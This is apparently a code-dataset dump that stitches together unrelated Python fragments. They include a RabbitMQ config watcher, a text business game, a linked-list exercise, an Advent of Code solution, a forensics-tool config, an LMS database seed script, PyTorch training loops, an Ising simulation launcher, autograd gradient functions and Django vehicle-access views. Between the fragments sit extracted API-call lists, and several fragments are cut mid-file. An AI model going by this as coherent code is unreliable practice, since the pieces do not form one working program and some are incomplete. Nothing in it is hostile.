# self._config_directory we only need check that (for get_routing_key)
config_folder = os.path.normpath(self._config_directory)
key = routing_key.get_routing_key(event.src_path, config_folder)
self._logger.debug("Sending config %s to RabbitMQ with routing key %s",
config_dict, key)
self._push_to_queue(config_dict, CONFIG_EXCHANGE, key)
@property
def config_directory(self) -> str:
return self._config_directory
@property
def watching(self) -> bool:
return self._watching
@property
def connected_to_rabbit(self) -> bool:
return self._connected_to_rabbit
def start(self) -> None:
"""
This method is used to start rabbit and the observer and begin watching
the config files. It also sends the configuration files for the first
time
:return None
"""
log_and_print("{} started.".format(self), self._logger)
self._initialise_rabbitmq()
"""
We want to start a thread that connects to rabbitmq and begins attempts
to send configs.
"""
self._create_and_start_sending_configs_thread()
def do_first_run_event(name: str) -> None:
event = FileSystemEvent(name)
event.event_type = _FIRST_RUN_EVENT
self._on_event_thrown(event)
self._logger.info("Throwing first run event for all config files")
self.foreach_config_file(do_first_run_event)
if not self._watching:
self._logger.info("Starting config file observer")
self._observer.start()
self._watching = True
else:
self._logger.info("File observer is already running")
self._logger.debug("Config file observer started")
self._connect_to_rabbit()
self._listen_for_data()
def _sending_configs_thread(self) -> None:
while True:
try:
if not self.publishing_queue.empty():
try:
self._send_data()
except MessageWasNotDeliveredException as e:
self.logger.exception(e)
except (ConnectionNotInitialisedException,
AMQPConnectionError) as e:
# If the connection is not initialised or there is a connection
# error, we need to restart the connection and try it again
self._logger.error("There has been a connection error")
self._logger.exception(e)
self._logger.info("Restarting the connection")
self._connected_to_rabbit = False
# Wait some time before reconnecting and then retrying
time.sleep(RE_INITIALISE_SLEEPING_PERIOD)
self._connect_to_rabbit()
self._logger.info("Connection restored, will attempt sending "
"the config.")
except AMQPChannelError:
# This error would have already been logged by the RabbitMQ
# logger and handled by RabbitMQ. Since a new channel is
# created we need to re-initialise RabbitMQ
self._initialise_rabbitmq()
raise e
self.rabbitmq.connection.sleep(10)
def _create_and_start_sending_configs_thread(self) -> None:
try:
self._current_thread = threading.Thread(
target=self._sending_configs_thread)
self._current_thread.start()
except Exception as e:
self._logger.error("Failed to start sending configs thread!")
self._logger.exception(e)
raise e
def _terminate_and_stop_sending_configs_thread(self) -> None:
if self._current_thread is not None:
self._current_thread.join()
self._current_thread = None
def _listen_for_data(self) -> None:
self._logger.info("Starting the config ping listener")
self._heartbeat_rabbit.start_consuming()
def _on_terminate(self, signum: int, stack: FrameType) -> None:
"""
This method is used to stop the observer and join the threads
"""
log_and_print("{} is terminating. Connections with RabbitMQ will be "
"closed, and afterwards the process will exit."
.format(self), self._logger)
if self._watching:
self._logger.info("Stopping config file observer")
self._observer.stop()
self._observer.join()
self._watching = False
self._logger.debug("Config file observer stopped")
else:
self._logger.info("Config file observer already stopped")
self.disconnect_from_rabbit()
self._terminate_and_stop_sending_configs_thread()
log_and_print("{} terminated.".format(self), self._logger)
sys.exit()
def foreach_config_file(self, callback: Callable[[str], None]) -> None:
"""
Runs a function over all the files being watched by this class
:param callback: The function to watch. Must accept a string for the
file path as {config_directory} + {file path}
:return: Nothing
"""
for root, dirs, files in os.walk(self.config_directory):
for name in files:
if any([fnmatch.fnmatch(name, pattern) for pattern in
self._file_patterns]):
callback(os.path.join(root, name))
|
[
"threading.Thread",
"watchdog.observers.polling.PollingObserver",
"watchdog.events.FileSystemEvent",
"pika.BasicProperties",
"os.path.join",
"src.utils.routing_key.get_routing_key",
"os.walk",
"time.sleep",
"os.path.normpath",
"configparser.ConfigParser",
"datetime.datetime.now",
"fnmatch.fnmatch",
"sys.exit"
] |
[((3614, 3631), 'watchdog.observers.polling.PollingObserver', 'PollingObserver', ([], {}), '()\n', (3629, 3631), False, 'from watchdog.observers.polling import PollingObserver\n'), ((11244, 11284), 'os.path.normpath', 'os.path.normpath', (['self._config_directory'], {}), '(self._config_directory)\n', (11260, 11284), False, 'import os\n'), ((11300, 11358), 'src.utils.routing_key.get_routing_key', 'routing_key.get_routing_key', (['event.src_path', 'config_folder'], {}), '(event.src_path, config_folder)\n', (11327, 11358), False, 'from src.utils import routing_key\n'), ((16105, 16115), 'sys.exit', 'sys.exit', ([], {}), '()\n', (16113, 16115), False, 'import sys\n'), ((16481, 16511), 'os.walk', 'os.walk', (['self.config_directory'], {}), '(self.config_directory)\n', (16488, 16511), False, 'import os\n'), ((10411, 10425), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (10423, 10425), False, 'from configparser import ConfigParser, DuplicateSectionError, DuplicateOptionError, InterpolationError, ParsingError\n'), ((12420, 12441), 'watchdog.events.FileSystemEvent', 'FileSystemEvent', (['name'], {}), '(name)\n', (12435, 12441), False, 'from watchdog.events import FileSystemEvent\n'), ((14611, 14664), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._sending_configs_thread'}), '(target=self._sending_configs_thread)\n', (14627, 14664), False, 'import threading\n'), ((8764, 8801), 'pika.BasicProperties', 'pika.BasicProperties', ([], {'delivery_mode': '(2)'}), '(delivery_mode=2)\n', (8784, 8801), False, 'import pika\n'), ((7021, 7062), 'time.sleep', 'time.sleep', (['RE_INITIALISE_SLEEPING_PERIOD'], {}), '(RE_INITIALISE_SLEEPING_PERIOD)\n', (7031, 7062), False, 'import time\n'), ((13923, 13964), 'time.sleep', 'time.sleep', (['RE_INITIALISE_SLEEPING_PERIOD'], {}), '(RE_INITIALISE_SLEEPING_PERIOD)\n', (13933, 13964), False, 'import time\n'), ((9380, 9394), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (9392, 9394), False, 'from datetime import datetime\n'), ((16568, 16598), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['name', 'pattern'], {}), '(name, pattern)\n', (16583, 16598), False, 'import fnmatch\n'), ((16690, 16714), 'os.path.join', 'os.path.join', (['root', 'name'], {}), '(root, name)\n', (16702, 16714), False, 'import os\n')]
|
import time
import os
red = "\033[0;91m"
green = "\033[0;92m"
yellow = "\033[0;93m"
blue = "\033[0;94m"
magenta = "\033[0;95m"
cyan = "\033[0;96m"
white = "\033[0;97m"
blue_back="\033[0;44m"
orange_back="\033[0;43m"
red_back="\033[0;41m"
grey_back="\033[0;40m"
def clear():
clear
def welcome():
print("Welcome to...")
print(blue+" ______ _ _____ _ ")
print(" | ___ \ (_) / ___(_) ")
print(" | |_/ /_ _ ___ _ _ __ ___ ___ ___ \ `--. _ _ __ ___ ")
print(" | ___ \ | | / __| | '_ \ / _ \/ __/ __| `--. \ | '_ ` _ \ ")
print(" | |_/ / |_| \__ \ | | | | __/\__ \__ \/\__/ / | | | | | | ")
print(" \____/ \__,_|___/_|_| |_|\___||___/___/\_ ")
clear()
welcome()
input()
clear()
username=input(green+"Welcome, before we get started,\nplease tell me your (user) name- ").capitalize()
if len(username)<3 or username=="Yeet" or username=="Ur mom":
print(red+"Thats not a name silly")
time.sleep(1)
clear()
elif username=="Cal":
os.system("python3 game.py")
else:
store=input("What's the store called- ")
print(magenta+"\nGreeting's",username,"and welcome to "+store+"...")
time.sleep(3)
print("I am giving you the role of manager for this shop. You can set prices, sell items, and that sort of thing. I'm sure you're very eager to begin.")
story=input("Would you like to take on your role as manager- ").lower()
if story=="yes" or story=="yep" or story=="y":
os.system("python game.py")
elif story=="no":
print("Ok")
time.sleep(2)
clear()
else:
print("Try again")
|
[
"os.system",
"time.sleep"
] |
[((1008, 1021), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1018, 1021), False, 'import time\n'), ((1056, 1084), 'os.system', 'os.system', (['"""python3 game.py"""'], {}), "('python3 game.py')\n", (1065, 1084), False, 'import os\n'), ((1207, 1220), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1217, 1220), False, 'import time\n'), ((1503, 1530), 'os.system', 'os.system', (['"""python game.py"""'], {}), "('python game.py')\n", (1512, 1530), False, 'import os\n'), ((1571, 1584), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1581, 1584), False, 'import time\n')]
|
"""
问题描述:给定链表的头结点head,实现删除链表的中间节点的函数,例如:
不删除任何节点;
1->2,删除节点1;
1->2->3,删除节点2;
1->2->3->4,删除节点2;
1->2->3->4->5,删除节点3;
进阶:
给定链表头节点head、整数a和b,实现删除位于a/b节点处的函数,例如:
链表1->2->3->4->5,假设a/b的值为r。
如果r等于0,不删除任何节点;
如果r在区间(0, 1/5]之间,删除节点1;
如果r在区间(1/5, 2/5]之间,删除节点2;
如果r在区间(2/5, 3/5]之间,删除节点3;
如果r在区间(3/5, 4/5]之间,删除节点4;
如果r在区间(4/5, 1]之间,删除节点5;
如果r大于1,不删除任何节点。
"""
import math
from linkedlist.toolcls import PrintMixin
class Node:
def __init__(self, value):
self.value = value
self.next = None
class RemoveNode(PrintMixin):
@classmethod
def remove_mid_node(cls, head):
if head is None or head.next is None:
return head
if head.next.next is None:
return head.next
pre = head
cur = head.next.next
while cur.next is not None and cur.next.next is not None:
cur = cur.next.next
pre = pre.next
pre.next = pre.next.next
return head
@classmethod
def remove_k_node(cls, head, a, b):
if b == 0:
raise RuntimeError('b can"t be 0')
if head is None or a > b or a == 0:
return head
n = 0
cur = head
while cur is not None:
cur = cur.next
n += 1
edge = math.ceil(a/b*n)
if edge == 1:
return head.next
pre = None
cur = head
while edge > 1:
pre = cur
cur = cur.next
edge -= 1
pre.next = cur.next
return head
if __name__ == '__main__':
node = Node(1)
node.next = Node(2)
node.next.next = Node(3)
node.next.next.next = Node(4)
node.next.next.next.next = Node(5)
node.next.next.next.next.next = Node(6)
RemoveNode.remove_mid_node(node)
RemoveNode.remove_k_node(node, 2, 5)
RemoveNode.print_list(node)
|
[
"math.ceil"
] |
[((1269, 1289), 'math.ceil', 'math.ceil', (['(a / b * n)'], {}), '(a / b * n)\n', (1278, 1289), False, 'import math\n')]
|
from collections import Counter
from days import AOCDay, day
@day(8)
class Day8(AOCDay):
test_input = """123456789012"""
test_input2 = """0222112222120000"""
width = 25
height = 6
BLACK = "0"
WHITE = "1"
TRANSPARENT = "2"
image_data = []
final_image = []
def common(self, input_data):
self.image_data = []
i = 0
layer = -1
while i < len(input_data):
layer += 1
self.image_data.append([])
for y in range(self.height):
self.image_data[layer].append([])
for x in range(self.width):
self.image_data[-1][-1].append(input_data[i])
i += 1
def part1(self, input_data):
fewest_zeroes = None
fewest_layer = None
for i, layer in enumerate(self.image_data):
layer = list("".join("".join(line) for line in layer))
c = Counter(layer)
amount = c.get("0", 0)
if fewest_zeroes is None or amount < fewest_zeroes:
print("new best layer {} with {} zeroes".format(i, fewest_zeroes))
fewest_zeroes = amount
fewest_layer = c
print("has {} ones and {} twos".format(fewest_layer.get("1"), fewest_layer.get("0")))
yield fewest_layer.get("1", 0) * fewest_layer.get("2", 0)
def part2(self, input_data):
# Generate empty image
for y in range(self.height):
self.final_image.append([])
for x in range(self.width):
self.final_image[-1].append(self.TRANSPARENT)
for y in range(self.height):
for x in range(self.width):
for layer in self.image_data:
if self.final_image[y][x] == self.TRANSPARENT:
if layer[y][x] != self.TRANSPARENT:
self.final_image[y][x] = layer[y][x]
break
yield "\n".join("".join(x) for x in self.final_image).replace("0", " ").replace("1", "#").replace("2", " ")
|
[
"collections.Counter",
"days.day"
] |
[((65, 71), 'days.day', 'day', (['(8)'], {}), '(8)\n', (68, 71), False, 'from days import AOCDay, day\n'), ((944, 958), 'collections.Counter', 'Counter', (['layer'], {}), '(layer)\n', (951, 958), False, 'from collections import Counter\n')]
|
#############################
# #
# DFIRTrack config file #
# #
#############################
from os.path import expanduser
# MAIN APP SETTINGS
## change path for the log file (default: `$HOME`) (used in `dfirtrack.settings`)
LOGGING_PATH = expanduser('~')
# ARTIFACTS
## folder to store artifacts on DFIRTrack server (used in `dfirtrack_artifacs.models` and `dfirtrack_main.models`)
EVIDENCE_PATH = expanduser('~') + '/dfirtrack_artifact_storage'
# deprecated, TODO: possibly use regarding tag handling (dfirtrack_main.importer.file.csv.system)
## add a list of strings representing the relevant tags you want to automatically import
#TAGLIST = []
## add a string used as prefix for clearly identifying previously automatically imported tags (e. g. "AUTO" leads to "AUTO_TAG")
#TAGPREFIX = ''
|
[
"os.path.expanduser"
] |
[((301, 316), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (311, 316), False, 'from os.path import expanduser\n'), ((462, 477), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (472, 477), False, 'from os.path import expanduser\n')]
|
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from LMS.model.models import Course
from LMS.model.models import Group
from LMS.model.models import Student
from LMS.model.models import Tutor
from LMS.model.models import User
db_url = os.getenv('DATABASE_URL')
engine = create_engine(db_url, echo=True)
Session = sessionmaker(bind=engine)
session = Session()
# first digit - the degree: 1 for Bachelor, 2 for Master, 3 for Specialist
# second digit - the year. 291 group entered in 2019
# third digit - the number of group in this year
group191 = Group(num=191, degree="Bachelor", grade=1)
group281 = Group(num=281, degree="Master", grade=2)
john = User(
id=1,
name="John",
family_name="Smith",
verification_code="john12",
is_registered=False,
)
alice = User(
id=2,
name="Alice",
family_name="Turner",
verification_code="alice12",
email="<EMAIL>",
password="<PASSWORD>",
middle_name="Sergeevna",
is_registered=True,
)
ann = User(
id=3,
name="Ann",
family_name="Wells",
middle_name="Sara",
verification_code="ann12",
email="<EMAIL>",
password="<PASSWORD>",
facebook_link="https://facebook.com/annawells",
is_registered=True,
)
session.add_all([group191, group281, john, alice, ann])
student_john = Student(user_id=john.id,
group_num=group191.num,
entry_year=2019,
is_pay=1)
student_alice = Student(user_id=alice.id,
group_num=group191.num,
entry_year=2019,
is_pay=0)
math_course = Course(
id=1,
name="Mathematics",
description="Introduction into mathematical analysis and linear algebra",
)
mem_course = Course(
id=42,
name="Higher Memology",
description="The most interesting aspects of modern memes. \
The basic knowledge of memology is obligatory",
)
philosophy_course = Course(id=2, name="Philosophy and history of science")
tutor_ann = Tutor(user_id=ann.id, course_id=philosophy_course.id)
session.add_all([
student_alice, student_john, tutor_ann, math_course, mem_course,
philosophy_course
])
session.commit()
|
[
"LMS.model.models.Course",
"LMS.model.models.Student",
"LMS.model.models.Group",
"LMS.model.models.User",
"LMS.model.models.Tutor",
"sqlalchemy.create_engine",
"sqlalchemy.orm.sessionmaker",
"os.getenv"
] |
[((276, 301), 'os.getenv', 'os.getenv', (['"""DATABASE_URL"""'], {}), "('DATABASE_URL')\n", (285, 301), False, 'import os\n'), ((312, 344), 'sqlalchemy.create_engine', 'create_engine', (['db_url'], {'echo': '(True)'}), '(db_url, echo=True)\n', (325, 344), False, 'from sqlalchemy import create_engine\n'), ((355, 380), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (367, 380), False, 'from sqlalchemy.orm import sessionmaker\n'), ((590, 632), 'LMS.model.models.Group', 'Group', ([], {'num': '(191)', 'degree': '"""Bachelor"""', 'grade': '(1)'}), "(num=191, degree='Bachelor', grade=1)\n", (595, 632), False, 'from LMS.model.models import Group\n'), ((644, 684), 'LMS.model.models.Group', 'Group', ([], {'num': '(281)', 'degree': '"""Master"""', 'grade': '(2)'}), "(num=281, degree='Master', grade=2)\n", (649, 684), False, 'from LMS.model.models import Group\n'), ((693, 790), 'LMS.model.models.User', 'User', ([], {'id': '(1)', 'name': '"""John"""', 'family_name': '"""Smith"""', 'verification_code': '"""john12"""', 'is_registered': '(False)'}), "(id=1, name='John', family_name='Smith', verification_code='john12',\n is_registered=False)\n", (697, 790), False, 'from LMS.model.models import User\n'), ((818, 986), 'LMS.model.models.User', 'User', ([], {'id': '(2)', 'name': '"""Alice"""', 'family_name': '"""Turner"""', 'verification_code': '"""alice12"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""', 'middle_name': '"""Sergeevna"""', 'is_registered': '(True)'}), "(id=2, name='Alice', family_name='Turner', verification_code='alice12',\n email='<EMAIL>', password='<PASSWORD>', middle_name='Sergeevna',\n is_registered=True)\n", (822, 986), False, 'from LMS.model.models import User\n'), ((1020, 1226), 'LMS.model.models.User', 'User', ([], {'id': '(3)', 'name': '"""Ann"""', 'family_name': '"""Wells"""', 'middle_name': '"""Sara"""', 'verification_code': '"""ann12"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""', 'facebook_link': '"""https://facebook.com/annawells"""', 'is_registered': '(True)'}), "(id=3, name='Ann', family_name='Wells', middle_name='Sara',\n verification_code='ann12', email='<EMAIL>', password='<PASSWORD>',\n facebook_link='https://facebook.com/annawells', is_registered=True)\n", (1024, 1226), False, 'from LMS.model.models import User\n'), ((1330, 1405), 'LMS.model.models.Student', 'Student', ([], {'user_id': 'john.id', 'group_num': 'group191.num', 'entry_year': '(2019)', 'is_pay': '(1)'}), '(user_id=john.id, group_num=group191.num, entry_year=2019, is_pay=1)\n', (1337, 1405), False, 'from LMS.model.models import Student\n'), ((1491, 1567), 'LMS.model.models.Student', 'Student', ([], {'user_id': 'alice.id', 'group_num': 'group191.num', 'entry_year': '(2019)', 'is_pay': '(0)'}), '(user_id=alice.id, group_num=group191.num, entry_year=2019, is_pay=0)\n', (1498, 1567), False, 'from LMS.model.models import Student\n'), ((1655, 1766), 'LMS.model.models.Course', 'Course', ([], {'id': '(1)', 'name': '"""Mathematics"""', 'description': '"""Introduction into mathematical analysis and linear algebra"""'}), "(id=1, name='Mathematics', description=\n 'Introduction into mathematical analysis and linear algebra')\n", (1661, 1766), False, 'from LMS.model.models import Course\n'), ((1790, 1956), 'LMS.model.models.Course', 'Course', ([], {'id': '(42)', 'name': '"""Higher Memology"""', 'description': '"""The most interesting aspects of modern memes. The basic knowledge of memology is obligatory"""'}), "(id=42, name='Higher Memology', description=\n 'The most interesting aspects of modern memes. The basic knowledge of memology is obligatory'\n )\n", (1796, 1956), False, 'from LMS.model.models import Course\n'), ((1984, 2038), 'LMS.model.models.Course', 'Course', ([], {'id': '(2)', 'name': '"""Philosophy and history of science"""'}), "(id=2, name='Philosophy and history of science')\n", (1990, 2038), False, 'from LMS.model.models import Course\n'), ((2052, 2105), 'LMS.model.models.Tutor', 'Tutor', ([], {'user_id': 'ann.id', 'course_id': 'philosophy_course.id'}), '(user_id=ann.id, course_id=philosophy_course.id)\n', (2057, 2105), False, 'from LMS.model.models import Tutor\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 05 23:55:12 2018
@author: <NAME>, <NAME>
"""
import sys
import numpy as np
import torch
import torch.nn as nn
# Training
def train(args, model, device, train_loader, optimizer, epoch, iteration):
model.train()
criterion = nn.CrossEntropyLoss(size_average=True) # previous PyTorch ver.
#criterion = nn.CrossEntropyLoss(reduction='sum')
for i_batch, sample_batched in enumerate(train_loader):
data, target = sample_batched["image"].to(device), sample_batched["label"].to(device)
optimizer.zero_grad()
output = model(data)
pred = output.max(1, keepdim=True)[1]
correct = pred.eq(target.view_as(pred)).sum().item()
loss = criterion(output, target)
loss.backward()
optimizer.step()
if i_batch % args.log_interval == 0:
sys.stdout.write("\repoch:{0:>3} iteration:{1:>6} train_loss: {2:.6f} train_accracy: {3:5.2f}%".format(
epoch, iteration, loss.item(), 100.*correct/float(len(sample_batched["label"]))))
sys.stdout.flush()
iteration += 1
# Validation
def val(args, model, device, test_loader, iteration):
model.eval()
criterion = nn.CrossEntropyLoss(size_average=False) # previous PyTorch ver.
#criterion = nn.CrossEntropyLoss(reduction='sum')
test_loss = 0
correct = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(test_loader):
data, target = sample_batched["image"].to(device), sample_batched["label"].to(device)
output = model(data)
test_loss += criterion(output, target).item()
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= float(len(test_loader.dataset))
correct /= float(len(test_loader.dataset))
print("\nValidation: Accuracy: {0:.2f}% test_loss: {1:.6f}".format(100. * correct, test_loss))
return test_loss, 100. * correct
|
[
"torch.no_grad",
"torch.nn.CrossEntropyLoss",
"sys.stdout.flush"
] |
[((274, 312), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'size_average': '(True)'}), '(size_average=True)\n', (293, 312), True, 'import torch.nn as nn\n'), ((1116, 1155), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'size_average': '(False)'}), '(size_average=False)\n', (1135, 1155), True, 'import torch.nn as nn\n'), ((1265, 1280), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1278, 1280), False, 'import torch\n'), ((985, 1003), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1001, 1003), False, 'import sys\n')]
|
from ising import *
import os
import numpy as np
Ns = [10, 20, 50, 100, 1000] # System Size
T_Tcs = np.linspace(0.5, 1.7, 30) # T/Tc
Tc = 2.268 # Onsager's Tc
for n in Ns:
for i, T_Tc in enumerate(T_Tcs):
T = T_Tc*Tc
wd = 'magnetization/size-{0}/temp-{1}'.format(n, i)
if not os.path.exists(wd):
os.makedirs(wd)
if n !=1000:
write_job_script(wd=wd, n=n, s= n * 1000000, T=T, i=i)
else:
write_job_script(wd=wd, n=n, s= n * 1000000, T=T, i=i, nprocs = 1, q ='long')
run_job(wd)
|
[
"os.path.exists",
"os.makedirs",
"numpy.linspace"
] |
[((102, 127), 'numpy.linspace', 'np.linspace', (['(0.5)', '(1.7)', '(30)'], {}), '(0.5, 1.7, 30)\n', (113, 127), True, 'import numpy as np\n'), ((309, 327), 'os.path.exists', 'os.path.exists', (['wd'], {}), '(wd)\n', (323, 327), False, 'import os\n'), ((342, 357), 'os.makedirs', 'os.makedirs', (['wd'], {}), '(wd)\n', (353, 357), False, 'import os\n')]
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class GRLog(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
if self.grad_log is not None:
self.grad_log.append(grad_output)
return grad_output * -self.lambd
class GRandAdd(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = grad_output + torch.rand_like(grad_output) * torch.mean(grad_output)
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRandMult(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = grad_output * (torch.rand_like(grad_output) - 1) * 2
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRandSign(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = grad_output * torch.sign(torch.rand_like(grad_output) - 1) * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRand(torch.autograd.Function):
def __init__(self, alpha=1., lambd=1., grad_log=None):
self.alpha = alpha
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = (torch.rand_like(grad_output) - 1) * self.alpha * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRInv(torch.autograd.Function):
def __init__(self, alpha=1., lambd=1., grad_log=None):
self.lambd = lambd
self.alpha = alpha
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = (torch.max(torch.abs(grad_output), 1)[0].unsqueeze(1) * torch.sign(grad_output) - grad_output) * self.alpha * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
|
[
"torch.mean",
"torch.rand_like",
"torch.abs",
"torch.sign"
] |
[((630, 658), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (645, 658), False, 'import torch\n'), ((661, 684), 'torch.mean', 'torch.mean', (['grad_output'], {}), '(grad_output)\n', (671, 684), False, 'import torch\n'), ((1008, 1036), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1023, 1036), False, 'import torch\n'), ((1758, 1786), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1773, 1786), False, 'import torch\n'), ((1377, 1405), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1392, 1405), False, 'import torch\n'), ((2207, 2230), 'torch.sign', 'torch.sign', (['grad_output'], {}), '(grad_output)\n', (2217, 2230), False, 'import torch\n'), ((2162, 2184), 'torch.abs', 'torch.abs', (['grad_output'], {}), '(grad_output)\n', (2171, 2184), False, 'import torch\n')]
|
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from django.urls import reverse_lazy
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from datetime import datetime
# Export XLSX
from steller.exports import exportXlsx
from steller.prints import printPdf
# My Files
from .models import Vehicle, Access
from accessApp.types.VehicleType import VehicleForm
from accessApp.types.AccessType import CrateAccessForm, AccessForm
from accessApp.repository import VehicleRepository
from accessApp.repository import AccessRepository
# Vehicle
class VehicleListView(LoginRequiredMixin, ListView):
model = Vehicle
template_name = 'vehicle/index.html'
paginate_by = 10
def get_queryset(self):
new_context = VehicleRepository.get_query_filter(self.request)
return new_context
def get_context_data(self, **kwargs):
context = VehicleRepository.get_context(self, VehicleListView)
return context
@login_required
def export_vehicles(request):
model = 'Vehicle'
filename = 'veiculos_exportados'
queryset = VehicleRepository.get_query_filter_export(request)
columns = ('Placa', 'Dono', 'Descrição')
response = exportXlsx(model, filename, queryset, columns)
return response
@login_required
def print_vehicles(request):
queryset = VehicleRepository.get_query_filter(request)
template = 'vehicle/print.html'
filename = 'steller-veículos'
return printPdf(request, filename, queryset, template)
class VehicleCreateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, CreateView):
permission_required = 'accessApp.add_vehicle'
model = Vehicle
form_class = VehicleForm
template_name = 'vehicle/new.html'
success_message = '%(field)s - criado com sucesso'
success_url = reverse_lazy('vehicle_index')
def get_context_data(self, **kwargs):
context = super(VehicleCreateView, self).get_context_data(**kwargs)
context['page_name'] = 'Veículos'
context['menu_vehicle'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
def form_valid(self, form):
self.object = form.save()
plate = self.object.plate
Access.objects.filter(plate=plate).update(vehicle=self.object.pk)
return super(VehicleCreateView, self).form_valid(form)
class VehicleUpdateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, UpdateView):
permission_required = 'accessApp.change_vehicle'
model = Vehicle
form_class = VehicleForm
template_name = 'vehicle/edit.html'
success_message = '%(field)s - editado com sucesso'
success_url = reverse_lazy('vehicle_index')
def get_context_data(self, **kwargs):
context = super(VehicleUpdateView, self).get_context_data(**kwargs)
context['page_name'] = 'Veículos'
context['menu_vehicle'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
class VehicleDeleteView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, DeleteView):
permission_required = 'accessApp.delete_vehicle'
model = Vehicle
template_name = 'vehicle/delete.html'
success_url = reverse_lazy('vehicle_index')
success_message = 'Deletado com sucesso'
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.is_active = False
self.object.save()
messages.success(self.request, self.success_message)
return HttpResponseRedirect(self.get_success_url())
# End Vehicle
# Access
class AccessListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_filter(self.request)
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context(self, AccessListView)
return context
class AccessTodayListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_today()
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context_today(self, AccessTodayListView)
return context
class AccessNotExitListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_not_exit()
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context_not_exit(self, AccessNotExitListView)
return context
@login_required
def export_access(request):
model = 'Access'
filename = 'acessos_exportados'
queryset = AccessRepository.get_query_export(request)
columns = ('Placa', 'Usuário', 'Entrada', 'Saída')
response = exportXlsx(model, filename, queryset, columns)
return response
@login_required
def print_access(request):
queryset = AccessRepository.get_query_filter(request)
template = 'access/print.html'
filename = 'steller-acessos'
return printPdf(request, filename, queryset, template)
class AccessCreateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, CreateView):
permission_required = 'controllerApp.add_access'
model = Access
form_class = CrateAccessForm
template_name = 'access/new.html'
success_message = '%(field)s - criado com sucesso'
success_url = reverse_lazy('access_index')
def get_context_data(self, **kwargs):
context = super(AccessCreateView, self).get_context_data(**kwargs)
context['page_name'] = 'Acessos'
context['menu_access'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
def form_valid(self, form):
self.object = form.save()
self.object.isCreatedManual = True
plate = self.object.plate
vehicle = self.object.vehicle
if (vehicle and int(vehicle.pk) > 0) and not plate:
plate = vehicle.plate
self.object.plate = plate.upper()
self.object.save()
return super(AccessCreateView, self).form_valid(form)
def get_initial(self):
entrance = datetime.now()
return {
'entrance': entrance,
}
class AccessUpdateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, UpdateView):
permission_required = 'controllerApp.change_access'
model = Access
